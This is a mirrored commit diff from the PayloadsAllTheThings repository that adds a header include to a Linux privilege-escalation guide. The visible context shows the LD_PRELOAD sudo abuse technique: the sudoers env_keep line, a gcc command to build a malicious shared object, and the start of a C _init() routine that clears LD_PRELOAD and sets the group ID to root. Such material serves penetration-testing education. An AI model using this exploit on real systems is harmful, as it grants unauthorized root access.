mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Merge pull request #398 from bash-c/patch-1
add missing header file in Linux - Privilege Escalation.md
This commit is contained in:
commit
2d273fd40e
1 changed files with 2 additions and 1 deletions
|
@ -442,10 +442,11 @@ Defaults env_keep += LD_PRELOAD
|
|||
|
||||
Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
|
||||
|
||||
```powershell
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
void _init() {
|
||||
unsetenv("LD_PRELOAD");
|
||||
setgid(0);
|
||||
|
|
Loading…
Reference in a new issue